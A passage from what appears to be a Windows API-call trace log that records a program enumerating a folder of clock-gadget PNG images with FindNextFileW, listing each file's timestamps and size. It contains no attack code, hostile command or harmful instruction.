ftLastWriteTime.dwLowDateTime=0x805c807b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.891] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285ac06b, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x285ac06b, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x285d21c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6530, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer.png", cAlternateFileName="")) returned 1 [0102.891] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828d4d58, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828d4d58, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x285d21c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x132, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_dot.png", cAlternateFileName="")) returned 1 [0102.892] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82888a9e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82888a9e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x285d21c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_h.png", cAlternateFileName="")) returned 1 [0102.892] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828aebfb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828aebfb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x285f8327, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_m.png", cAlternateFileName="")) returned 1 [0102.892] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828d4d58, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828d4d58, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x285f8327, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc63, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_s.png", cAlternateFileName="")) returned 1 [0102.892] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828d4d58, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828d4d58, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2861e485, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7454, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_settings.png", cAlternateFileName="")) returned 1 [0102.892] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828faeb5, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828faeb5, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2861e485, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x77b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner.png", cAlternateFileName="")) returned 1 [0102.892] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294716f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8294716f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2861e485, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb80, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_dot.png", cAlternateFileName="")) returned 1 [0102.893] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828faeb5, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x828faeb5, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2861e485, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_h.png", cAlternateFileName="")) returned 1 [0102.893] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82921012, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82921012, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x286445e3, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_m.png", cAlternateFileName="")) returned 1 [0102.893] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82921012, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82921012, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x286445e3, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_s.png", cAlternateFileName="")) returned 1 [0102.893] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8296d2cc, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8296d2cc, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2866a741, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7fb7, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_settings.png", cAlternateFileName="")) returned 1 [0102.893] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82993429, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82993429, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2866a741, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x876e, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower.png", cAlternateFileName="")) returned 1 [0102.894] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829df6e3, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x829df6e3, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2866a741, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x141, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_dot.png", cAlternateFileName="")) returned 1 [0102.894] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82993429, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82993429, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2866a741, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x184, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_h.png", cAlternateFileName="")) returned 1 [0102.894] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829b9586, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x829b9586, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x287c138f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_m.png", cAlternateFileName="")) returned 1 [0102.894] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829b9586, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x829b9586, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x287c138f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc14, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_s.png", cAlternateFileName="")) returned 1 [0102.894] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a05840, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a05840, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x287e74ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x827b, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_settings.png", cAlternateFileName="")) returned 1 [0102.894] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a05840, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a05840, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x287e74ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3cfe, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern.png", cAlternateFileName="")) returned 1 [0102.895] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a51afa, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a51afa, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x287e74ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb96, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_dot.png", cAlternateFileName="")) returned 1 [0102.895] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a2b99d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a2b99d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2880d64b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_h.png", cAlternateFileName="")) returned 1 [0102.895] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a2b99d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a2b99d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2880d64b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_m.png", cAlternateFileName="")) returned 1 [0102.895] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a51afa, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a51afa, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2880d64b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbde, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_s.png", cAlternateFileName="")) returned 1 [0102.899] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a51afa, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a51afa, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288337a9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x51d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_settings.png", cAlternateFileName="")) returned 1 [0102.899] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a77c57, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a77c57, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288337a9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6408, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty.png", cAlternateFileName="")) returned 1 [0102.900] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82aea06e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82aea06e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288337a9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb57, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_dot.png", cAlternateFileName="")) returned 1 [0102.900] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a9ddb4, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82a9ddb4, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28859907, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_h.png", cAlternateFileName="")) returned 1 [0102.900] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82ac3f11, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82ac3f11, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28859907, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_m.png", cAlternateFileName="")) returned 1 [0102.900] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82aea06e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82aea06e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28859907, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb67, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_s.png", cAlternateFileName="")) returned 1 [0102.900] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b101cb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82b101cb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2887fa65, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x702e, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_settings.png", cAlternateFileName="")) returned 1 [0102.901] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cff384, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82cff384, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2887fa65, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_bottom.png", cAlternateFileName="")) returned 1 [0102.901] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d254e1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d254e1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288a5bc3, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x87, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_divider_left.png", cAlternateFileName="")) returned 1 [0102.902] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d254e1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d254e1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288a5bc3, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x87, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_divider_right.png", cAlternateFileName="")) returned 1 [0102.902] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d4b63e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d4b63e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288cbd21, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_left.png", cAlternateFileName="")) returned 1 [0102.902] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d4b63e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d4b63e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288f1e7f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_right.png", cAlternateFileName="")) returned 1 [0102.903] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d4b63e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d4b63e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288f1e7f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_top.png", cAlternateFileName="")) returned 1 [0102.903] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d7179b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d7179b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x288f1e7f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_bottom_left.png", cAlternateFileName="")) returned 1 [0102.903] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d7179b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d7179b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28a2296f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xa5, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_bottom_right.png", cAlternateFileName="")) returned 1 [0102.903] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d7179b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d7179b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28a2296f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_top_left.png", cAlternateFileName="")) returned 1 [0102.903] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d978f8, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d978f8, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28a48acd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_top_right.png", cAlternateFileName="")) returned 1 [0102.903] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d978f8, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d978f8, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28a48acd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x83, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_divider.png", cAlternateFileName="")) returned 1 [0102.904] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d978f8, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d978f8, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28ae1045, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x91, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_divider_left.png", cAlternateFileName="")) returned 1 [0102.904] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d978f8, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82d978f8, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b071a3, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_divider_right.png", cAlternateFileName="")) returned 1 [0102.904] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dbda55, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82dbda55, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b2d301, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_disabled.png", cAlternateFileName="")) returned 1 [0102.904] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82de3bb2, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82de3bb2, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b2d301, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x41a, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_hover.png", cAlternateFileName="")) returned 1 [0102.904] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82de3bb2, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82de3bb2, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b5345f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x464, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_pressed.png", cAlternateFileName="")) returned 1 [0102.904] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e09d0f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82e09d0f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b795bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_rest.png", cAlternateFileName="")) returned 1 